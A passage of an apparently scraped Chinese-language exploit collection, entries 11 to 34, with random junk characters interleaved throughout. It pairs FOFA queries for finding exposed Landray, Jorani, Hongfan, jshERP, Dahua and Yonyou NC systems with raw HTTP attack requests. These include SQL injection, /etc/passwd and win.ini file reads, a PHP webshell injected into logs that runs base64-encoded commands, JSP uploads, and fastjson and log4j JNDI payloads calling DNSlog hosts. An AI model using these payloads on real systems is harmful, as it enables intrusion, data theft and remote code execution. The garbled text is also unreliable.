( v) I5 B3 j6 ~" F2 t7 p7 i9 P------WebKitFormBoundaryxdgaqmqu--% |* F& T  l' I2 n# L
" Z- M9 ]2 v4 h3 `

) M8 V% C0 V/ u1 }- p3 `11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入/ o0 p4 c- ^( M
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
5 |( u+ a) z/ ?6 f/ c3 FGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
$ J  h. O( {0 ^/ O! H" J$ o0 fHost: 127.0.0.1# F1 @) _% y# t. M
Pragma: no-cache4 _. E! r+ I" a* f: h1 C
Cache-Control: no-cache
  E( Z0 U7 {5 G/ d6 A6 t+ WUpgrade-Insecure-Requests: 1
& n- W" G( _7 i' p  k" \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36. J' g. Q6 v) [& E4 D0 E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' a+ e7 Q- x' q/ q: c9 A$ nAccept-Encoding: gzip, deflate/ j, g+ A/ w) d1 L
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
' M3 M5 {& [1 b/ sConnection: close- ^+ k# s$ L! D6 p' B4 r* S

0 C3 v( ?1 P+ X. ~* ^: V7 I8 k; S8 L7 P
12. Jorani < 1.0.2 远程命令执行
8 k* [' A! N( x# v+ AFOFA:title="Jorani"
5 L- x# x6 K( B! l- x5 D; e第一步先拿到cookie( ^" M5 b! I. v9 K
GET /session/login HTTP/1.12 I0 M; z* O8 ~, N, w
Host: 192.168.190.307 Y% d1 Q  q2 y- f/ D" F( m2 u: V
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.366 U$ ~- y( v; f+ l! k+ L3 g' x  {
Connection: close. t# c- s3 J4 h( q' w- u/ p( S; ]4 c
Accept-Encoding: gzip' ]1 w1 G% F) }' z/ H/ Y  ~4 e# E% U
( i, i) ^: ~4 M, K% y( y

7 f+ H% j4 p+ N  @8 ]9 K响应中csrf_cookie_jorani用于后续请求
+ g& c6 o$ V2 f& Q2 S8 [* |HTTP/1.1 200 OK4 \  w8 n' J* O% l( L% k$ c* @
Connection: close' H/ {, W8 k2 _2 t2 n# n& ~
Cache-Control: no-store, no-cache, must-revalidate
( ?* M1 Y/ V, z8 M. wContent-Type: text/html; charset=UTF-8
, w, g- s& X. Z  \Date: Tue, 24 Oct 2023 09:34:28 GMT
; E# }( g6 R- w- m+ W/ J+ j+ lExpires: Thu, 19 Nov 1981 08:52:00 GMT5 ]6 V6 M  q/ [6 _
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT  j/ M9 I. j. Y& c+ Y* M+ W
Pragma: no-cache0 i' G/ O2 m% O0 C  A2 J
Server: Apache/2.4.54 (Debian), f0 |" U& |% F8 o$ a
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
5 Y' a7 f9 [+ a% GSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly5 W+ j, h! O& r, [* q8 [: S( p
Vary: Accept-Encoding
6 j; @& a& @( r. @, T- ]; o+ ~% l1 w! k
7 b- l  d' o9 C0 z* ^
POST请求,执行函数并进行base64编码
6 [( [& e& L$ I, f" N4 V1 kPOST /session/login HTTP/1.1
0 k; Y# r/ v$ b$ _( {7 f+ e) \Host: 192.168.190.30
* J7 w# f: n$ z: i* WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.364 u' z8 ?8 e% |
Connection: close1 L1 `% E6 D- j5 l" D7 t( w
Content-Length: 252
; f; ?4 d9 @" s  C% d& _Content-Type: application/x-www-form-urlencoded' o) o' k. ]$ V6 n; E8 @
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
6 m; Y, s/ G+ i3 S' }  Z( L) _Accept-Encoding: gzip
( b8 B+ Q) r$ i. |. z
- }, w- \7 ]8 F8 X/ y! a" Kcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
+ o0 N+ D( [8 d' i( @  x$ x' C; B& l8 w+ G0 F9 ]

1 E7 A2 D) K' f: K. C  Y4 z! g; b" _1 }9 I# y
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串" I  s- \, a; U0 n
GET /pages/view/log-2023-10-24 HTTP/1.1
# a. Z' m# l6 dHost: 192.168.190.30
7 V% K* W7 k) k  _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36! N2 h2 _* t  Y* i" A/ ?
Connection: close; V" |( j5 U, }; X. x
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r" i% S5 _) R% w  I* g) W
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=! M+ ]  i# F$ ~+ `; l! S& Q9 c
X-REQUESTED-WITH: XMLHttpRequest
) d" C6 {3 K. G) D& [) oAccept-Encoding: gzip
& T6 G. i, @. |; g* O; ~8 [; n+ R# ?
6 |7 S0 N, w3 z5 V  _  O0 l* l2 @
1 I# p+ n! o# n13. 红帆iOffice ioFileDown任意文件读取' W+ m% A6 k9 A6 a' c/ V
FOFA:app="红帆-ioffice"& U( @$ o& o4 e3 {# E9 u8 `+ F
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
; c7 d) |# P4 p  cHost: x.x.x.x6 H" E. A% S: {' m: }) D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
7 h6 i0 ^, `! D3 J, B  s0 B7 `Connection: close
7 |* }( E* S; p& yAccept: */*( m* O0 {- g/ m  R. d0 t
Accept-Encoding: gzip  `) D4 |; q. t2 r' C

, g- z3 J# O! c# G0 f+ q% |
  c! s" ?  q2 X4 O14. 华夏ERP(jshERP)敏感信息泄露
* [+ J, ~5 Z2 r6 ~FOFA:body="jshERP-boot"
/ P) z& o* e: k# R泄露内容包括用户名密码
3 \( U/ Y  i6 gGET /jshERP-boot/user/getAllList;.ico HTTP/1.1# z; E7 q% C- A4 m# B/ ?2 N; E: Q4 ^
Host: x.x.x.x
' J6 }$ T; U& v1 KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
& }( ^' e7 @& X: h" C6 J0 YConnection: close; y5 ]9 W. ]! J+ U  l- t4 F
Accept: */*
$ n* X( l2 O" }2 F. D: GAccept-Language: en
) q) _2 w7 f0 B. Q' |% ~3 A# P; {Accept-Encoding: gzip
9 M: Z$ q7 H, j; D% i( p2 E: K$ t0 E+ n0 j% i+ j
4 c; C0 t8 u, C+ |7 k: g
15. 华夏ERP getAllList信息泄露
% O( n+ c  l% M  SCVE-2024-04903 R% D; N( p$ [! Z
FOFA:body="jshERP-boot"4 a! x4 P4 C+ ^5 u6 ~9 Z
泄露内容包括用户名密码
; ?1 a. S6 d8 {0 |: X* L$ p% UGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.14 e5 M" ~7 i5 W+ k. {$ O* f
Host: 192.168.40.130:100
; {/ p4 h/ s  U7 J( p3 O6 ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
/ t; s) @3 o. b# GConnection: close: O+ b* d8 C6 B0 p" S
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.85 s3 q: Q2 g; l' a0 D
Accept-Language: en
: {# v3 f6 R2 esec-ch-ua-platform: Windows
4 Z- F+ Y" Y+ W9 ^2 M- rAccept-Encoding: gzip
8 |. S" i( f1 g* i5 h9 f8 e# u- P3 R8 [1 ]/ u/ @5 K) O+ K, K; J
+ r4 T+ O3 d* E, t  [
16.  红帆HFOffice医微云SQL注入
* R  L: o# a- T3 C8 \1 DFOFA:title="HFOffice"9 n* s! f( R+ F# z* I
poc中调用函数计算1234的md5值
- |4 B. Q5 B  p" y9 }GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
) Y* M& w2 N2 ^7 C* ?1 ZHost: x.x.x.x
  K  C8 I# D1 XUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36- u2 U  h5 q3 _; M/ @& f/ x4 t- u1 L
Connection: close, Y+ \8 r& s2 m/ w* A1 ~
Accept: */*
/ D. `9 A* N: S/ s: e3 MAccept-Language: en. Y  f+ Z. r- l5 [$ ~/ J0 ]
Accept-Encoding: gzip
1 }, p4 {6 o* w/ S9 h  e
0 k9 f5 |. J4 f1 q  i  z& K% Z5 Y6 }7 V5 r8 n. f
17. 大华 DSS itcBulletin SQL 注入
" Q. ?3 j7 d, N7 R  S* ]7 d- bFOFA:app="dahua-DSS"
1 a9 x1 T1 w* Z3 J8 F8 T/ LPOST /portal/services/itcBulletin?wsdl HTTP/1.1! S% F( E" K3 ~
Host: x.x.x.x
2 m9 U5 n( E0 TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: j' ]5 V9 W9 H* ^Connection: close
: |# ]: X5 C1 |: g- r' h, I, BContent-Length: 345
) P; L) @4 B5 t& k, CAccept-Encoding: gzip
+ H: m5 Q+ a4 R
8 q$ c5 K' b+ K( w  O<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
0 }+ C# Z9 {) o: m0 i5 ~<s11:Body>& m5 u& o0 q7 ?
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>( [! ?/ O0 Z5 y4 s1 z+ [+ v8 U
      <netMarkings>
, \, I6 k* u. A# ~# a       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1- ^5 n7 K/ F$ G! |
      </netMarkings>
$ X) _/ T* A2 H, n' c    </ns1:deleteBulletin>
# @$ b: N0 a; B/ T, C$ Q$ J  </s11:Body>
* Y, P$ {9 O+ n0 u" i</s11:Envelope>- x  K$ I: _  k& Q
0 y5 a/ Z) J: q- @9 j- n$ \, s$ {
5 C8 S# ]4 c% \1 G5 d3 Z; ^
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
6 g: y$ {  U4 W# F) ~* N9 WFOFA:app="dahua-DSS"$ J2 ]7 @- \, v
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
) Q) M- m' V" I& q9 H" K& m5 z6 pHost: your-ip
$ t  C. z- v/ j4 k" R# zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. k* b, W5 Z! C- n3 g
Accept-Encoding: gzip, deflate
% m+ X& o% x& c9 i) W7 AAccept: */*
- Z' P7 \% ]) F, NConnection: keep-alive
, X0 J' C3 X, @  c; T8 O  ^: q
, b  @# }2 ?8 V: D/ d- Q6 l9 k0 I' |' @# \# M7 K& d
1 J# G* W4 ?& Z; f  Y/ J* k# W
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入- L* f- A0 X( B+ P8 l
FOFA:app="dahua-DSS"6 y' ^6 o4 ?. S1 M
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
8 x$ a  S( z1 B- F$ MHost:
) x% h6 |) {2 K3 r  eUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36. |5 J9 a8 v9 v5 I5 _: B' \
Accept-Encoding: gzip, deflate2 \* A; U- T- b& S5 c
Accept: */*
. v5 ^  k+ x) p7 bConnection: keep-alive
4 t# w7 X$ z$ M; ?# l" U% H2 f1 P0 _( c2 \2 L: v

  r$ l2 O- {5 ~20. 大华ICC智能物联综合管理平台任意文件读取
- z4 v% H. }5 B) f5 CFOFA:body="*客户端会小于800*"
& b4 h: X9 b3 s7 {2 b: p' T# \" G  jGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
2 H/ f+ m$ ~0 m( L# E# iHost: x.x.x.x. C) M) k% S( W
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
7 h+ o$ i: N* N* q' R. K, `7 vConnection: close
. ]' q3 {# g' H' L4 MAccept: */*
" T& N4 v; h: XAccept-Language: en
* \. V$ T# ]+ |" C& P9 V8 V  e4 N: xAccept-Encoding: gzip" z4 u3 @/ Y) w  g. ~* l$ b0 y7 d
2 T8 b! w' }6 w

6 L  S- [' K6 k! Z/ j  F2 I' c! |21. 大华ICC智能物联综合管理平台random远程代码执行
; z2 Z1 F% x9 q: ?FOFA:icon_hash="-1935899595"$ W  z0 ~( _3 P1 A" H' E' s9 K
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1- u% I5 w! o+ V, m/ O/ x1 |/ p" t$ P
Host: x.x.x.x
9 i; z( ~1 ]% w; ~) N+ AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: h' ^, p) M: I( kContent-Length: 161) v& Y1 d1 |+ |5 {5 y
Accept-Encoding: gzip- m7 {& C0 K3 o4 P
Connection: close
, E# `: X  Z! r6 J5 E  TContent-Type: application/json;charset=utf-8$ m9 o* c1 E# {( f

, R5 O8 \! e$ P0 Y{7 Z, z/ E* B# _+ J
"a":{, m. J) M, m  ]
   "@type":"com.alibaba.fastjson.JSONObject",& l3 v2 X# V/ ^; i1 R( }
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  L( g0 a' _- P" e2 Y) B! L' |  }""
  `# z# T) C6 i3 }6 L* y}
+ e/ s% [) ^8 R1 Z; f4 d8 ^
8 i1 ]0 z+ _# B) a/ p
# n5 e0 D$ \1 h* L4 R) o) Z0 B22. 大华ICC智能物联综合管理平台 log4j远程代码执行
( K6 u6 J# [* K+ BFOFA:icon_hash="-1935899595"- t" z3 |" W0 _4 Q% D+ W% J
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
5 X8 x+ i  _8 O1 fHost: your-ip7 ]8 y+ |: S4 d+ i& C8 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
2 Y1 M: c5 o3 n& _7 u1 Q. VContent-Type: application/json;charset=utf-8
& o  H0 |# N: ]1 N
/ v9 B6 ~$ g) T7 P' W1 s* D" ~( o. g{1 |9 D: k) C+ O( j& e& r4 [4 y
"loginName":"${jndi:ldap://dnslog}"3 k2 R( A( s, ~6 w8 K% Y% A8 z3 D
}
& k3 e: ^; y2 x2 b2 q3 ?  R# m
2 k  d; @2 x: v, S+ ~; d. g5 C$ E% K- q$ x  p. \3 D

% R5 C- H# @' }" Z! ]' p* `23. 大华ICC智能物联综合管理平台 fastjson远程代码执行  z5 R/ C2 @% F0 E8 R/ G
FOFA:icon_hash="-1935899595"6 G$ }  A+ S+ F' o
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1% [6 M0 W7 ]- J* R% \* p8 ?
Host: your-ip
. }4 i0 J+ J1 v5 O$ t* wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% r+ }2 A) g( H. g+ @( L) ~Content-Type: application/json;charset=utf-8
/ k) {3 }- u  ^- G2 _Accept-Encoding: gzip
( U  [. E' z4 FConnection: close" H* ~& z0 c$ B3 @; w" l$ C
! u9 q; {- I) U6 R
{
/ l% q5 V5 |' }) Z- F" C0 a  s    "a":{* N6 o5 V$ d) ?
        "@type":"com.alibaba.fastjson.JSONObject",: ?9 Q( n9 f+ }* c+ v
       {"@type":"java.net.URL","val":"http://DNSLOG"}$ `( t' Z# w) n5 }0 N
        }""( S- r! J& [7 W
}; q  ^/ f" ^# Y( K+ D0 Z6 u
- |, S9 {: j: A/ t# u, z  N

  q. N) z$ s9 E) v' i! [24. 用友NC 6.5 accept.jsp任意文件上传& {9 A. l! ^3 O9 a. p
FOFA:icon_hash="1085941792"+ z5 s/ y! x5 R% Q  F
POST /aim/equipmap/accept.jsp HTTP/1.1
' ]' z- _& A7 C2 y0 w* ~3 jHost: x.x.x.x3 t3 y. F6 [& q$ A
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36$ ~7 _  _: F5 }3 E6 t8 {' z
Connection: close2 R# E& `( N+ Y# d: g! e3 l4 ~
Content-Length: 449' u$ @. z* Z8 Q  l5 I
Accept: */*# d, @; C# m& h# G3 [; Y
Accept-Encoding: gzip
* F+ W9 q- h; T% wContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc: e; l" a" H0 d# ]) A

5 g; J9 W1 P( w1 Q9 d& S6 G; i4 o-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc6 j+ H& O* N+ m: a/ o$ T6 P
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt", w  g: }6 O$ Y, W% e% Q
Content-Type: text/plain
! K5 R! T  G" ]1 t, W, a4 r9 G/ [: x; p$ ?2 A0 N: {( e- h7 ~
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>7 z% o2 h( c; @3 w! {# A5 Y
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
! u; w9 e6 `' M7 y# KContent-Disposition: form-data; name="fname"
; e8 ?* r) x, J7 |. n9 Q8 t9 ?! z) J2 z( c
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp: y. H  {5 k0 Z8 c; H2 C, a
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
+ K3 W0 s8 D7 w4 _1 E( _5 ]3 y' V5 I  C* }2 B# e
9 a" |& F, r* x7 F7 r
25. 用友NC registerServlet JNDI 远程代码执行
' h5 i- E- ^6 o. v5 f  V. MFOFA:app="用友-UFIDA-NC"# a! B2 z8 ^4 I- v: k
POST /portal/registerServlet HTTP/1.1
& C& X7 \/ ~/ N, S: m! y% n% RHost: your-ip
- T3 J; ~3 K& N1 [. ~; `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0) z3 z" o) T& j: F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9. E/ [# n4 D1 x) k! `
Accept-Encoding: gzip, deflate
' |1 M/ r6 Q. C8 P) V! H! D6 zAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6+ O' @! H& x) U6 E
Content-Type: application/x-www-form-urlencoded
) `" s9 n8 K( o( G+ n, l, J1 F8 N% s
6 T. G* u9 U% u0 Ctype=1&dsname=ldap://dnslog" a$ p' i+ z* Q: l2 [8 |

& J# J) w7 A- A
2 G9 y4 o3 S) C" j) j. e7 _; x% Q$ I& ?+ l; T$ n
26. 用友NC linkVoucher SQL注入
. i2 k/ d0 X' T- A# KFOFA:app="用友-UFIDA-NC"7 w8 ~2 v) b  U
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1/ M, F' q1 `( u7 b0 `2 ?: P. H
Host: your-ip$ |; J  e, C4 @6 [# `# v: P. l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
  W! G0 z/ f9 P$ n, W+ J4 a, D8 SContent-Type: application/x-www-form-urlencoded
2 e7 }5 `  U9 vAccept-Encoding: gzip, deflate
4 t% G. j( O- S, B+ d/ sAccept: */*# m& S9 W2 U! l2 Q. d9 j
Connection: keep-alive6 c. j7 S0 J9 O
! p. U0 I1 J7 @/ o& b6 s  z7 D

, D) l" J, M, e6 n* x27. 用友 NC showcontent SQL注入: A$ o- [) N, N) z1 [) Q
FOFA:icon_hash="1085941792"
9 V/ A. c4 f! z5 w: ]1 GGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.14 ^6 A4 x( D1 y( t
Host: your-ip+ r" g( J" w2 w3 _8 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 b, K+ f- A# S0 n
Accept-Encoding: identity
0 s, D/ |  O& v8 jConnection: close) Q0 S  U9 C9 {# f3 Y
Content-Type: text/xml; charset=utf-8
9 h3 B9 n* U' [# `. ^- H% w- V3 l5 d4 |7 a1 ^, [) C: i: S+ g

; [( d" h+ W# V- M28. 用友NC grouptemplet 任意文件上传1 v; D! I/ Y( k' c
FOFA:icon_hash="1085941792"
+ @' J/ J( ]7 v/ ]1 D& e$ ]POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.10 d. P! v- O% M9 {3 |
Host: x.x.x.x
1 C; V4 }2 Y$ m9 d5 R' qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.367 x! ], p/ E- B' c3 p- a. ]  U
Connection: close0 w" }, Y3 H3 D
Content-Length: 268* e8 V, z8 t) l2 }% H* E5 t
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk1 t6 H3 n7 ]( @( V3 c9 \3 ~' m
Accept-Encoding: gzip0 K8 n0 {& e; d. E3 p6 n

% D) j: @' {- A! X------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk" d, j- U6 a  z2 C/ M. `+ n( _- }
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"" |: |4 V0 l# k8 ^5 X$ I0 m
Content-Type: application/octet-stream
* @8 w& F. X% ?* n8 X7 Q, z
) f. G& [' v, x: u<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>/ G  u, N" L+ N
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
! k! Z2 o& h9 f+ ~& s5 t& n
/ q2 {% }3 i9 W3 u0 A3 _6 f- d6 N$ a2 L% Q6 C
/uapim/static/pages/nc/head.jsp
* s9 R' q8 b7 {' x& n0 v) j0 n- Z5 f, Q; n( [6 q2 i8 a
29. 用友NC down/bill SQL注入+ {! C9 G9 v" m4 W* M9 m8 y
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"% [" k! T2 k7 _/ R, w$ {
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
% s5 f1 R6 \& |, d/ ]Host: your-ip* E6 _5 v$ L$ J4 _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 b, f7 h: i% D: \Content-Type: application/x-www-form-urlencoded  U5 O, M; T" p5 \
Accept-Encoding: gzip, deflate  M4 G- w2 C1 d# n
Accept: */*) [7 @; j1 S; ?+ @3 K, |
Connection: keep-alive
7 ?1 J  g# j# J2 j3 R1 F, {- }5 a* K, Z

! `+ O- E; W* }& N/ {  W30. 用友NC importPml SQL注入7 S5 B1 i3 B, H/ E3 \. v0 ?
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"2 M, i( Z' k4 D' z
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
# u. {' u6 h& V' f* t8 DHost: your-ip
3 W4 p# n6 K- A% h* F; YContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
5 n& R  @) G) O' u+ gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
! ?, @, a# v& J4 PConnection: close  X4 M/ E# W: L( C) x. n
$ b1 I7 w& G# F3 ]0 N  a' l3 ?
------WebKitFormBoundaryH970hbttBhoCyj9V  Y, j4 V9 W0 I
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
, h7 X4 V- d9 N, B$ t; Y5 KContent-Type: image/jpeg/ S3 l9 e  ?2 ?* m& O9 A% m5 @
------WebKitFormBoundaryH970hbttBhoCyj9V--  X5 h" d7 Q7 s6 Z$ }! V/ p$ w1 _" t
$ P4 N1 h. d! Z
5 F+ ?1 T& a9 @9 O. u( p
31. 用友NC runStateServlet SQL注入
+ n+ N: i3 j9 H+ ~5 z) ?* dversion<=6.5
3 @6 O1 A/ T( I9 s+ lFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
% ]0 A! Z4 f# r7 l0 \3 g4 L3 QGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
2 M+ |2 e* }  n" tHost: host0 W2 p" ~- v, t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.364 v2 b2 |- ^# z8 ?
Content-Type: application/x-www-form-urlencoded
0 G# @# j: Z" V/ @$ @. [4 M5 p( ^! n0 u

8 H6 J; _' z* X: F- z) S32. 用友NC complainbilldetail SQL注入8 e: K6 |9 V8 _, Y" X! Q- I: ^
version= NC633、NC65
. m0 S! @+ x# _( J* ^# ^3 vFOFA:app="用友-UFIDA-NC"
9 S1 C3 F. S% dGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
, ^5 z' A. i) F5 \. EHost: your-ip
* [* Z3 M5 L' z. k1 C9 s+ oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ j4 s3 K/ t" M# h2 ?! S# I/ @
Content-Type: application/x-www-form-urlencoded7 P( {3 K, d7 j/ V1 K
Accept-Encoding: gzip, deflate# c# `/ a1 g" o+ ?( c# p
Accept: */*! E% M# Q; c1 I6 X0 Z
Connection: keep-alive9 f, l- e0 F: b6 M1 U
: D+ n5 E9 p  C4 j, M3 z' _) o$ d% o) T

& G) j: Q1 g; _/ H' Y/ w+ j6 s( n/ t33. 用友NC downTax/download SQL注入
% k/ x' L1 `  x/ y8 _% l0 ]version:NC6.5FOFA:app="用友-UFIDA-NC"
* ~6 P: X7 D1 T1 R% BGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
' `( T, u0 v8 T$ [Host: your-ip
  p' [# o6 v1 \" h( f8 vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 b; K, E# l: J% h* Q) w
Content-Type: application/x-www-form-urlencoded
6 _1 b5 R  d* N& ]9 ZAccept-Encoding: gzip, deflate
" k% `3 c' l! i, g. r$ [Accept: */*
# t: i! \" w3 m& v4 k4 rConnection: keep-alive' k0 Y& B1 @- E$ T6 e; i

0 k8 S$ t  R! ]
5 S, G; L) M5 E8 t- [* I" t; V8 }34. 用友NC warningDetailInfo接口SQL注入/ G! Y2 ]  A% M4 x, O; a# C5 a
FOFA:app="用友-UFIDA-NC"
& C" c4 @( T# \4 c3 z- W) r, }GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
0 t1 f, M% W: A" [7 i4 t. x7 [. e( mHost: your-ip$ e6 Q1 }# L6 g' r; M; A
